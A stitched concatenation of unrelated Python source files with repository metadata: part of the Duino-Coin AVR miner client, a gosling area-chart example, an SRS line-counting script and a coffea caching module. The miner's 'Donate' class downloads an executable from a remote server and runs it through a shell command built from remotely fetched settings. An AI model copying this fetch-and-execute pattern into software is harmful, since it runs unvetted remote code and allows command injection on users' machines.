"no response - IP ban or connection error")
except Exception as e:
if "Expecting value" in str(e):
pretty_print("net0", get_string("node_picker_unavailable")
+ f"15s {Style.RESET_ALL}({e})",
"warning")
else:
pretty_print("net0", get_string("node_picker_error")
+ f"15s {Style.RESET_ALL}({e})",
"error")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if osname == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
donation_settings = requests.get(
"https://server.duinocoin.com/donations/settings.json").json()
if os.name == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ f'-o {donation_settings["url"]} '
+ f'-u {donation_settings["user"]} '
+ f'-p {donation_settings["pwd"]} '
+ f'-s 4 -e {donation_level*2}')
elif os.name == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate '
+ f'-o {donation_settings["url"]} '
+ f'-u {donation_settings["user"]} '
+ f'-p {donation_settings["pwd"]} '
+ f'-s 4 -e {donation_level*2}')
if donation_level <= 0:
pretty_print(
'sys0', Fore.YELLOW
+ get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning')
sleep(5)
if donation_level > 0:
debug_output(get_string('starting_donation'))
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print('sys0',
get_string('thanks_donation').replace("\n", "\n\t\t"),
'error')
shares = [0, 0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
mining_start_time = time()
if not path.exists(Settings.DATA_DIR):
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + '/Translations.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url, timeout=5)
with open(Settings.DATA_DIR + '/Translations.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(Settings.DATA_DIR + '/Translations.json', 'r',
encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
try:
if not Path(Settings.DATA_DIR + '/Settings.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('de'):
lang = 'german'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('jp'):
lang = 'japanese'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('it'):
lang = 'italian'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
elif locale.startswith('az'):
lang = 'azerbaijani'
elif locale.startswith('nl'):
lang = 'dutch'
elif locale.startswith('ko'):
lang = 'korean'
elif locale.startswith("id"):
lang = "indonesian"
elif locale.startswith("cz"):
lang = "czech"
elif locale.startswith("fi"):
lang = "finnish"
else:
lang = 'english'
else:
try:
config.read(Settings.DATA_DIR + '/Settings.cfg')
lang = config["AVR Miner"]['language']
except Exception:
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return string_name
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
if symbol:
val = str(round(val)) + " "
else:
val = str(round(val))
return val + symbol
def debug_output(text: str):
if debug == 'y':
print(Style.RESET_ALL + Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ Style.NORMAL + f'DEBUG: {text}')
def title(title: str):
if osname == 'nt':
"""
Changing the title in Windows' cmd
is easy - just use the built-in
title command
"""
ossystem('title ' + title)
else:
"""
Most *nix terminals use
this escape sequence to change
the console window title
"""
try:
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
except Exception as e:
print(e)
def handler(signal_received, frame):
pretty_print(
'sys0', get_string('sigint_detected')
+ Style.NORMAL + Fore.RESET
+ get_string('goodbye'), 'warning')
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
global username
global donation_level
global avrport
global hashrate_list
global debug
global rig_identifier
global discord_presence
global SOC_TIMEOUT
if not Path(str(Settings.DATA_DIR) + '/Settings.cfg').is_file():
print(
Style.BRIGHT + get_string('basic_config_tool')
+ Settings.DATA_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL + get_string('dont_have_account')
+ Fore.YELLOW + get_string('wallet') + Fore.RESET
+ get_string('register_warning'))
correct_username = False
while not correct_username:
username = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz"])
r = requests.get(f"https://server.duinocoin.com/users/{username}",
timeout=Settings.SOC_TIMEOUT).json()
correct_username = r["success"]
if not correct_username:
print(get_string("incorrect_username"))
response = requests.get(
"https://server.duinocoin.com/mining_key"
+ "?u=" + username, timeout=10
).json()
mining_key = "None"
if response["has_key"]:
mining_key = input(Style.RESET_ALL + Fore.YELLOW
+ get_string("ask_mining_key")
+ Fore.RESET + Style.BRIGHT)
mining_key = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT + Fore.RESET
+ ' ' + str(port))
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
rig_identifier = ''
while True:
current_port = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET + Style.BRIGHT)
if current_port in port_names:
confirm_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET + Style.BRIGHT)
if confirm_identifier == 'y' or confirm_identifier == 'Y':
current_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET + Style.BRIGHT)
rig_identifier += current_identifier
else:
rig_identifier += "None"
avrport += current_port
confirmation = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET + Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
rig_identifier += ','
else:
break
else:
print(Style.RESET_ALL + Fore.RED
+ 'Please enter a valid COM port from the list above')
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET + Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
donation_level = int(donation_level)
config["AVR Miner"] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 10,
"discord_presence": "y",
"periodic_report": 60,
"mining_key": mining_key}
with open(str(Settings.DATA_DIR)
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
rig_identifier = rig_identifier.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
hashrate_list = [0] * len(avrport)
else:
config.read(str(Settings.DATA_DIR) + '/Settings.cfg')
username = config["AVR Miner"]['username']
avrport = config["AVR Miner"]['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = int(config["AVR Miner"]['donate'])
debug = config["AVR Miner"]['debug']
rig_identifier = config["AVR Miner"]['identifier'].split(',')
Settings.SOC_TIMEOUT = int(config["AVR Miner"]["soc_timeout"])
Settings.AVR_TIMEOUT = float(config["AVR Miner"]["avr_timeout"])
discord_presence = config["AVR Miner"]["discord_presence"]
Settings.REPORT_TIME = int(config["AVR Miner"]["periodic_report"])
hashrate_list = [0] * len(avrport)
def greeting():
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string('banner')
+ Style.RESET_ALL + Fore.MAGENTA
+ f' {Settings.VER}' + Fore.RESET
+ ' 2019-2023')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL + Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + lang.capitalize()
+ " translation: " + Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('avr_on_port')
+ Style.BRIGHT + Fore.YELLOW
+ ', '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM + Fore.MAGENTA + Settings.BLOCK
+ Style.NORMAL + Fore.RESET
+ get_string('donation_level') + Style.BRIGHT
+ Fore.YELLOW + str(donation_level))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('algorithm')
+ Style.BRIGHT + Fore.YELLOW
+ 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('rig_identifier')
+ Style.BRIGHT + Fore.YELLOW + rig_identifier)
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string("using_config")
+ Style.BRIGHT + Fore.YELLOW
+ str(Settings.DATA_DIR + '/Settings.cfg'))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + str(greeting) + ', '
+ Style.BRIGHT + Fore.YELLOW
+ str(username) + '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(905158274490441808)
RPC.connect()
Thread(target=update_rich_presence).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate_list), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(shares[0]) + "/"
+ str(shares[0] + shares[1])
+ " accepted shares",
large_image="avrminer",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
print("Error updating Discord RPC thread: " + str(e))
sleep(15)
def pretty_print(sender: str = "sys0",
msg: str = None,
state: str = "success"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("avr"):
bg_color = Back.MAGENTA
else:
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "info":
fg_color = Fore.BLUE
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ bg_color + Style.BRIGHT + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type, accept, reject, total_hashrate,
computetime, diff, ping, reject_cause=None):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |avrN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
try:
total_hashrate = get_prefix("H/s", total_hashrate, 2)
except:
total_hashrate = "? H/s"
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
if reject_cause:
share_str += f"{Style.NORMAL}({reject_cause}) "
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + Back.MAGENTA + Fore.RESET
+ " avr" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.MAGENTA
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def mine_avr(com, threadid, fastest_pool, thread_rigid):
global hashrate
start_time = time()
report_shares = 0
last_report_share = 0
while True:
shares = [0, 0, 0]
while True:
try:
ser.close()
pretty_print('sys' + port_num(com),
f"No response from the board. Closed port {com}",
'success')
sleep(2)
except:
pass
try:
ser = Serial(com, baudrate=int(Settings.BAUDRATE),
timeout=int(Settings.AVR_TIMEOUT))
"""
Sleep after opening the port to make
sure the board resets properly after
receiving the DTR signal
"""
sleep(2)
break
except Exception as e:
pretty_print(
'sys'
+ port_num(com),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ f' (avr connection err: {e})',
'error')
sleep(10)
retry_counter = 0
while True:
try:
if retry_counter > 3:
fastest_pool = Client.fetch_pool()
retry_counter = 0
debug_output(f'Connecting to {fastest_pool}')
s = Client.connect(fastest_pool)
server_version = Client.recv(s, 6)
if threadid == 0:
if float(server_version) <= float(Settings.VER):
pretty_print(
'net0', get_string('connected')
+ Style.NORMAL + Fore.RESET
+ get_string('connected_server')
+ str(server_version) + ")",
'success')
else:
pretty_print(
'sys0', f' Miner is outdated (v{Settings.VER}) -'
+ get_string('server_is_on_version')
+ server_version + Style.NORMAL
+ Fore.RESET + get_string('update_warning'),
'warning')
sleep(10)
Client.send(s, "MOTD")
motd = Client.recv(s, 1024)
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
get_string("motd") + Fore.RESET
+ Style.NORMAL + str(motd),
"success")
break
except Exception as e:
pretty_print('net0', get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error')
retry_counter += 1
sleep(10)
pretty_print('sys' + port_num(com),
get_string('mining_start') + Style.NORMAL + Fore.RESET
+ get_string('mining_algorithm') + str(com) + ')',
'success')
# Perform a hash test to assign the starting diff
prev_hash = "ba29a15896fd2d792d5c4b60668bf2b9feebc51d"
exp_hash = "d0beba883d7e8cd119ea2b0e09b78f60f29e0968"
exp_result = 50
retries = 0
while retries < 3:
try:
debug_output(com + ': Sending hash test to the board')
ser.write(bytes(str(prev_hash
+ Settings.SEPARATOR
+ exp_hash
+ Settings.SEPARATOR
+ "10"
+ Settings.SEPARATOR),
encoding=Settings.ENCODING))
debug_output(com + ': Reading hash test from the board')
result = ser.read_until(b'\n').decode().strip().split(',')
ser.flush()
if result[0] and result[1]:
_ = int(result[0], 2)
debug_output(com + f': Result: {result[0]}')
else:
raise Exception("No data received from the board")
if int(result[0], 2) != exp_result:
raise Exception(com + f': Incorrect result received!')
computetime = round(int(result[1], 2) / 1000000, 5)
num_res = int(result[0], 2)
hashrate_test = round(num_res / computetime, 2)
break
except Exception as e:
debug_output(str(e))
retries += 1
else:
pretty_print('sys' + port_num(com),
f"Can't start mining on {com}" + Fore.RESET
+ f" - board keeps responding improperly. "
+ "Check if the code has been uploaded correctly "
+ "and your device is supported by Duino-Coin.",
'error')
break
start_diff = "AVR"
if hashrate_test > 12000:
start_diff = "ESP32"
elif hashrate_test > 6000:
start_diff = "ESP8266H"
elif hashrate_test > 4500:
start_diff = "ESP8266"
elif hashrate_test > 1000:
start_diff = "DUE"
elif hashrate_test > 520:
start_diff = "ARM"
elif hashrate_test > 370:
start_diff = "MEGA"
pretty_print('sys' + port_num(com),
get_string('hashrate_test')
+ get_prefix("H/s", hashrate_test, 2)
+ Fore.RESET
+ get_string('hashrate_test_diff')
+ start_diff)
while True:
try:
if config["AVR Miner"]["mining_key"] != "None":
key = b64.b64decode(config["AVR Miner"]["mining_key"]).decode()
else:
key = config["AVR Miner"]["mining_key"]
debug_output(com + ': Requesting job')
Client.send(s, 'JOB'
+ Settings.SEPARATOR
+ str(username)
+ Settings.SEPARATOR
+ start_diff
+ Settings.SEPARATOR
+ str(key)
)
job = Client.recv(s, 128).split(Settings.SEPARATOR)
debug_output(com + f": Received: {job[0]}")
try:
diff = int(job[2])
except:
pretty_print("sys" + port_num(com),
f" Node message: {job[1]}", "warning")
sleep(3)
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
sleep(3)
break
retry_counter = 0
while True:
if retry_counter > 3:
break
try:
debug_output(com + ': Sending job to the board')
ser.write(bytes(str(job[0]
+ Settings.SEPARATOR
+ job[1]
+ Settings.SEPARATOR
+ job[2]
+ Settings.SEPARATOR),
encoding=Settings.ENCODING))
debug_output(com + ': Reading result from the board')
result = ser.read_until(b'\n').decode().strip().split(',')
if result[0] and result[1]:
_ = int(result[0], 2)
debug_output(com + f': Result: {result[0]}')
break
else:
raise Exception("No data received from AVR")
except Exception as e:
debug_output(com + f': Retrying data read: {e}')
ser.flush()
retry_counter += 1
continue
if retry_counter > 3:
break
try:
computetime = round(int(result[1], 2) / 1000000, 5)
num_res = int(result[0], 2)
hashrate_t = round(num_res / computetime, 2)
hashrate_mean.append(hashrate_t)
hashrate = mean(hashrate_mean[-5:])
hashrate_list[threadid] = hashrate
except Exception as e:
pretty_print('sys' + port_num(com),
get_string('mining_avr_connection_error')
+ Style.NORMAL + Fore.RESET
+ ' (no response from the board: '
+ f'{e}, please check the connection, '
+ 'port setting or reset the AVR)', 'warning')
break
try:
Client.send(s, str(num_res)
+ Settings.SEPARATOR
+ str(hashrate_t)
+ Settings.SEPARATOR
+ f'Official AVR Miner {Settings.VER}'
+ Settings.SEPARATOR
+ str(thread_rigid)
+ Settings.SEPARATOR
+ str(result[2]))
responsetimetart = now()
feedback = Client.recv(s, 64).split(",")
responsetimestop = now()
time_delta = (responsetimestop -
responsetimetart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
diff = get_prefix("", int(diff), 0)
debug_output(com + f': retrieved feedback: {" ".join(feedback)}')
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
debug_output(com + f': error parsing response: {e}')
sleep(5)
break
if feedback[0] == 'GOOD':
shares[0] += 1
printlock.acquire()
share_print(port_num(com), "accept",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
elif feedback[0] == 'BLOCK':
shares[0] += 1
shares[2] += 1
printlock.acquire()
share_print(port_num(com), "block",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
elif feedback[0] == 'BAD':
shares[1] += 1
printlock.acquire()
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping, feedback[1])
printlock.release()
else:
printlock.acquire()
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping, feedback)
printlock.release()
title(get_string('duco_avr_miner') + str(Settings.VER)
+ f') - {shares[0]}/{(shares[0] + shares[1])}'
+ get_string('accepted_shares'))
end_time = time()
elapsed_time = end_time - start_time
if threadid == 0 and elapsed_time >= Settings.REPORT_TIME:
report_shares = shares[0] - last_report_share
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time, end_time, report_shares,
shares[2], hashrate, uptime)
start_time = time()
last_report_share = shares[0]
def periodic_report(start_time, end_time, shares,
block, hashrate, uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" " + get_string('periodic_mining_report')
+ Fore.RESET + Style.NORMAL
+ get_string('report_period')
+ str(seconds) + get_string('report_time')
+ get_string('report_body1')
+ str(shares) + get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3')
+ get_string('report_body7') + str(block)
+ get_string('report_body4')
+ str(int(hashrate)) + " H/s" + get_string('report_body5')
+ str(int(hashrate*seconds)) + get_string('report_body6')
+ get_string('total_mining_time') + str(uptime), "success")
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime >= 7200: # 2 hours, plural
return str(uptime // 3600) + get_string('uptime_hours')
elif uptime >= 3600: # 1 hour, not plural
return str(uptime // 3600) + get_string('uptime_hour')
elif uptime >= 120: # 2 minutes, plural
return str(uptime // 60) + get_string('uptime_minutes')
elif uptime >= 60: # 1 minute, not plural
return str(uptime // 60) + get_string('uptime_minute')
else: # less than 1 minute
return str(round(uptime)) + get_string('uptime_seconds')
if __name__ == '__main__':
init(autoreset=True)
title(f"{get_string('duco_avr_miner')}{str(Settings.VER)})")
if sys.platform == "win32":
os.system('') # Enable VT100 Escape Sequence for WINDOWS 10 Ver. 1607
check_updates()
try:
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0', get_string('load_config_error')
+ Settings.DATA_DIR + get_string('load_config_error_warning')
+ Style.NORMAL + Fore.RESET + f' ({e})', 'error')
debug_output(f'Error reading configfile: {e}')
sleep(10)
_exit(1)
try:
greeting()
debug_output('Greeting displayed')
except Exception as e:
debug_output(f'Error displaying greeting message: {e}')
try:
check_mining_key(config)
except Exception as e:
debug_output(f'Error checking miner key: {e}')
if donation_level > 0:
try:
Donate.load(donation_level)
Donate.start(donation_level)
except Exception as e:
debug_output(f'Error launching donation thread: {e}')
try:
fastest_pool = Client.fetch_pool()
threadid = 0
for port in avrport:
Thread(target=mine_avr,
args=(port, threadid,
fastest_pool, rig_identifier[threadid])).start()
threadid += 1
except Exception as e:
debug_output(f'Error launching AVR thread(s): {e}')
if discord_presence == "y":
try:
init_rich_presence()
except Exception as e:
debug_output(f'Error launching Discord RPC thread: {e}')
|
660e63d257396e6f7515f44b9f7b4c53d4ff7331
|
dcbce7d48685588f12e2909d256b0b608fbf689f
|
/gosling/examples/area_chart.py
|
448af3d3b9f21b99da97be0c52f062b628ef826b
|
[
"MIT"
] |
permissive
|
gosling-lang/gos
|
89b7cf76a81b51bf21f20dbc167d4ce3f494f97d
|
0f22464b91163944b8654127e02fa64b0106dc21
|
refs/heads/main
| 2023-07-22T07:55:54.733935
| 2023-06-28T17:19:50
| 2023-06-28T17:19:50
| 387,874,230
| 155
| 11
|
MIT
| 2023-09-04T16:08:52
| 2021-07-20T18:00:50
|
Python
|
UTF-8
|
Python
| false
| false
| 602
|
py
|
area_chart.py
|
"""
Area Chart
==========
"""
# category: basic marks
import gosling as gos
data = gos.multivec(
url="https://resgen.io/api/v1/tileset_info/?d=UvVPeLHuRDiYA3qwFlm7xQ",
row="sample",
column="position",
value="peak",
categories=["sample 1"],
)
domain = gos.GenomicDomain(chromosome="chr1", interval=[2000500, 3000500])
track = gos.Track(data).mark_area().encode(
x=gos.X("position:G", domain=domain, axis="bottom"),
y="peak:Q",
size=gos.value(2),
).properties(width=725, height=180, layout="linear")
track.view(title="Basic Marks: Area", subtitle="Tutorial Examples")
|
ac52679e28c535eab64c5305d88b0eb283c09d75
|
2dfc2beac0ad497f8fc59201921097a412f0df7f
|
/trunk/research/code-statistic/cs.py
|
187cc4e76703c6b50becd3a59cbd0ce99b8a06d9
|
[
"Apache-2.0",
"LicenseRef-scancode-mulanpsl-2.0-en",
"MIT",
"MulanPSL-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ossrs/srs
|
cf9442478fedcd32ef2817f8d53f405a6fa2c7d1
|
7138edd318d30b545e73e80500adda771817f8d1
|
refs/heads/develop
| 2023-09-01T03:38:35.057515
| 2023-08-31T01:45:25
| 2023-08-31T01:49:36
| 34,777,562
| 23,557
| 5,046
|
MIT
| 2023-09-09T00:57:42
| 2015-04-29T06:59:32
|
C++
|
UTF-8
|
Python
| false
| false
| 2,888
|
py
|
cs.py
|
#!/usr/bin/python
#
# Copyright (c) 2013-2021 Winlin
#
# SPDX-License-Identifier: MIT
#
#################################################################################
# to stat the code and comments lines
#################################################################################
import sys
def trace(msg):
print msg
pass
def info(msg):
print msg
pass
def verbose(msg):
#print msg
pass
def process(f, code_file):
info("process file success")
(stat_code, stat_block_comments, stat_line_comments) = (0, 0, 0)
is_block_comments = False
is_line_comments = False
for line in f.readlines():
line = line.strip()
if is_block_comments:
if "*/" in line:
verbose("[block][end] %s"%line)
is_block_comments = False
is_line_comments = False
else:
verbose("[block][cont] %s"%line)
stat_block_comments += 1
continue
if line.startswith("/*"):
verbose("[block][start] %s"%line)
is_block_comments = True
is_line_comments = False
stat_block_comments += 1
# inline block comments
if is_block_comments:
if "*/" in line:
verbose("[block][end] %s"%line)
is_block_comments = False
is_line_comments = False
continue
if line.startswith("//"):
verbose("[line] %s"%line)
is_block_comments = False
is_line_comments = True
stat_line_comments += 1
continue
verbose("[code] %s"%line)
is_block_comments = False
is_line_comments = False
stat_code += 1
total = stat_code + stat_block_comments + stat_line_comments
comments = stat_block_comments + stat_line_comments
trace("total:%s code:%s comments:%s block:%s line:%s file:%s"%(total, stat_code, comments, stat_block_comments, stat_line_comments, code_file))
return (0, total, stat_code, comments, stat_block_comments, stat_line_comments, code_file)
def do_stat(code_file):
f = None
try:
f = open(code_file, "r")
info("open file success");
return process(f, code_file)
finally:
if f is not None:
f.close()
info("close file success")
return (-1, 0, 0, 0, 0, 0, None)
code_file = None
if __name__ == "__main__":
if len(sys.argv) <= 1:
print "to stat the code and comments lines"
print "Usage: python %s <code_file>"%(sys.argv[0])
print " code_file: the code(header or source) file to stat"
print "Example:"
print " python %s src/core/srs_core.hpp"%(sys.argv[0])
sys.exit(-1)
code_file = sys.argv[1]
info("stat %s"%(code_file))
do_stat(code_file)
|
67439de99a60c635fcb8809466fcef72f306fb6b
|
6a017c87a1c3e016de5e1704d23d1d2034fab41c
|
/src/coffea/nanoevents/mapping/util.py
|
b8897d47080067e4f8723a3caeb520f318a41ffa
|
[
"BSD-3-Clause"
] |
permissive
|
CoffeaTeam/coffea
|
53997aefbccf583cc901718b5c639a4b4535dbcd
|
a33fc173f3bf2be307bac6517e624fc6ce0c4c3e
|
refs/heads/master
| 2023-08-10T12:36:49.238010
| 2023-08-02T02:57:18
| 2023-08-02T02:57:18
| 159,673,139
| 116
| 100
|
BSD-3-Clause
| 2023-09-12T20:32:08
| 2018-11-29T13:47:57
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,258
|
py
|
util.py
|
import weakref
from collections.abc import Mapping, MutableMapping
from coffea.nanoevents.util import key_to_tuple
class CachedMapping(Mapping):
"""A cache-wrapped mapping
Reads will call into ``cache`` first, and if no key exists,
the read will fall back to ``base``, saving the reult into ``cache``.
"""
def __init__(self, cache, base):
self.cache = cache
self.base = base
self.stats = {"hit": 0, "miss": 0}
def __getitem__(self, key):
try:
value = self.cache[key]
self.stats["hit"] += 1
return value
except KeyError:
value = self.base[key]
self.cache[key] = value
self.stats["miss"] += 1
return value
def __iter__(self):
return iter(self.base)
def __len__(self):
return len(self.base)
class ArrayLifecycleMapping(MutableMapping):
"""A tool to monitor the lifetime of arrays
Useful for detecting if arrays are getting properly cleaned up
by garbage collection. To be used with NanoEventsFactory as a "fake"
``persistent_cache``
Example::
from coffea.nanoevents import NanoEventsFactory
from coffea.nanoevents.mapping import ArrayLifecycleMapping
array_log = ArrayLifecycleMapping()
def run():
events = NanoEventsFactory.from_root(
"file.root",
persistent_cache=array_log,
).events()
# ... access things
run()
# may consider gc.collect() here
print("Accessed:", array_log.accessed)
print("Finalized:", array_log.finalized)
print("Possibly leaking arrays:", set(array_log.accessed) - set(array_log.finalized))
"""
def __init__(self):
self.accessed = []
self.finalized = []
def __getitem__(self, key):
raise KeyError
def __setitem__(self, key, value):
key = key_to_tuple(key)[4]
key = key.split(",")[0]
self.accessed.append(key)
weakref.finalize(value, self.finalized.append, key)
